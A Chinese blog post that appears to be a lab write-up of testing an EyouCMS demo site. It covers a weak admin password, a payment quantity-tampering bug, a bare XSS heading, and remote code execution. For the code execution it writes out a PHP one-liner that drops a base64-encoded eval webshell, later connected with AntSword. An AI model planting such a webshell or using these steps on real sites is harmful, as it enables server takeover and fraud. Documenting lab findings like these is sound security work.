易优demo网站测试结果

最新推荐文章于 2024-06-06 10:21:49 发布
最新推荐文章于 2024-06-06 10:21:49 发布
阅读量631 收藏 7
点赞数 11
文章标签: 经验分享 笔记 xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59047731/article/details/135722702
版权

易优demo网站测试结果-06

1、信息收集

网站账号:admin 密码:Aa123456

2、存在的漏洞

2.1 后台弱口令漏洞

http://eyoucms-s347fqn.gxalabs.com/login.php?s=Admin/login

在这里插入图片描述

网站账号:admin 密码:Aa123456

成功登陆

在这里插入图片描述

2.2 代码远程执行漏洞

漏洞链接
http://xxxx.com/login.php

在这里插入图片描述

点击进入之后是这个样子

在这里插入图片描述

选择pc文件下的index文件

在这里插入图片描述

输入一句话代码

<?php file_put_contents("./uploads/shell.php",base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbNjY2XSk7Pz4="));?>

点击确认提交

然后返回首页,访问upload/shell.php 文件

在这里插入图片描述

代码执行成功

连接蚁剑,成功连接

在这里插入图片描述

2.3 支付漏洞

漏洞链接
http://eyoucms-s347fqn.gxalabs.com/?m=home&c=View&a=index&aid=100

点击立即购买

在这里插入图片描述

抓包修改数量为2

在这里插入图片描述

点击提交订单

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

然后就会发现,金额不对

原价5499*2=10998

在这里插入图片描述

2.6 xss漏洞

漏洞点基本信息

http://eyoucms.gxalabs.com/login.php

在这里插入图片描述

在这里插入图片描述

落樱坠入星野
关注
  • 11
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
html5网站demo
12-25
运用html5+css建成的两个网站demo,5个页面,具有参考性意义(读书网)
网页demo演示
08-23
基本的网页demo
网站demo
weixin_44556624的博客
10-05 555
学成教育在线网站demo <style> *{ margin: 0; padding: 0; } .w{ width: 1200px; margin: auto; } body{ background-color: #f3f5f7; } /*清除li前面的原点*/ li{ list-style: none; } /*ul,li{margin:0; padding:0;}*/ a{ text-decoration: none; } /*清除浮
Gradio.NET:一个快速制作演示demo网页的利器
最新发布
mingupup的博客
06-06 1165
本文介绍了Gradio.NET这个项目。
商城网站demo
12-11
个人商城网站demo
响应式网站demo
10-22
用的响应式布局,初学者可以看看
易优电子科技公司网站管理系统
08-17
易优电子科技公司网站管理系统:深度解析与应用探讨》 易优电子科技公司网站管理系统,作为一款专为电子科技企业量身定制的建站解决方案,凭借其基于Thinkphp5.0内核的强大功能和高度拓展性,已经成为众多企业...
易优企业网站源码 无加密
08-12
在实际使用过程中,用户可以通过【test.youyi.com】这个压缩包子文件进行本地部署和测试,了解易优企业网站源码的具体运行情况。熟悉源码结构和功能后,无论是初学者还是资深开发者,都能快速上手并进行定制化开发,...
精美简洁作文范文网站源码 易优CMS模板
11-10
精美简洁作文范文网站源码 易优CMS模板 易优 CMS 精美简洁作文范文网站模板,资讯类企业网站模板,适用于博客、文章、资讯类网站使用。 模板自带 eyoucms 内核,无需再下载 eyou 系统。 原创设计、手工书写 DIV+...
易优电子科技公司网站管理系统 v4.2
11-05
易优电子科技公司网站管理系统 v4.2》是一款基于Thinkphp5.0框架精心打造的企业建站解决方案,专为电子科技行业量身定制。该系统以高效、稳定、易用为核心,旨在帮助企业在互联网上建立专业且具有高度可拓展性的...
易优批量图片加水印插件
04-30
易优批量图片加水印插件是一款针对易优CMS(EyouCMS)设计的专业插件,主要用于提升网站的用户体验和优化网页加载速度。在互联网环境中,网页加载速度是影响用户体验的关键因素之一,尤其是当页面中包含大量图片时,...
手机网站Demo
04-07
手机网站Demo psd HTML5 响应式设计
门户网站 demo
06-14
门户网站 demo
网站demo-主页面
10-08
网站demo 主页面代码,布局完整,仿K线宝网站
网页分享Demo
06-23
本工程用于演示百度分享的使用 本工程编码方式:UTF-8 注意: 1、访问页面时http请求不要使用localhost,要将其改为计算机IP地址或者改为127.0.0.1 2、相关博客:http://blog.csdn.net/gaohuanjie/article/details/32701459
公司官网demo
09-13
安装步骤: 1、下载文件,并且解压到网站的根目录下或者根目录下新建一个目录,配置好apache/IIS虚拟主机; 2、安装网址http://localhost/(localhost为您网址地址) 3、网站后台入口 http://localhost/admin/index.php 4、环境要求:PHP + Mysql 5、伪静态安装 Apache Web Server(独立主机用户) 不用配置 IIS Web Server(独立主机用户) 伪静态文件在根目录/httpd.ini IIS7 Web Server(独立主机用户) 伪静态文件在根目录/web.config
电商网站demo设计
代码帮
12-16 377
以上是一些基本的HTML和CSS的示例代码,你需要根据项目的实际需求进行进一步的设计和开发。此外,对于响应式布局,你可以使用CSS媒体查询来适应不同屏幕大小。创新和创意可以根据项目需求进行自由发挥,包括数据可视化、动画效果等。这是一个相当详细的网站设计要求,涉及到登录、主页、注册等多个方面。以下是一些简单的示例代码和说明,帮助你开始实现这些要求。
网页模板demo
04-19
网页模板demo,关于亚马逊的后台管理系统
响应式的网页demo(原创)
01-24
响应式的网页demo(原创)响应式的网页demo(原创)响应式的网页demo(原创)
易优(eyoucms)双语通用企业集团网站源码
09-08
易优(eyoucms)是一种双语通用的企业集团网站源码。它是一种开源的网站建设系统,可以用于创建企业集团网站易优CMS提供了丰富的功能和模块,可以满足企业集团网站的各种需求。 首先,易优CMS具有双语通用的功能。这意味着企业集团可以使用易优CMS来构建支持多种语言的网站。通过易优CMS,企业可以轻松地创建多个语言版本的页面,并提供多语言的导航、内容和栏目。这样,企业就可以更好地服务于不同国家和地区的客户和合作伙伴。 其次,易优CMS提供了丰富的功能和模块。它包括了企业网站所需的各种功能,如新闻资讯、产品展示、在线咨询、人才招聘等。企业集团可以根据自己的需求选择合适的模块,并根据自己的品牌形象进行自定义。易优CMS还提供了强大的后台管理系统,企业可以方便地管理和更新网站内容。 易优CMS还拥有友好的界面和易于使用的操作。无需专业的网站开发经验,企业集团的工作人员也可以轻松地使用易优CMS来编辑和发布内容。同时,易优CMS提供了响应式设计,使网站在不同终端设备上都能够正常显示和浏览。 总之,易优CMS是一种双语通用的企业集团网站源码,它提供了丰富的功能和模块,方便企业集团构建自己的网站。通过易优CMS,企业集团可以更好地服务于全球客户和合作伙伴,提高品牌形象和竞争力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值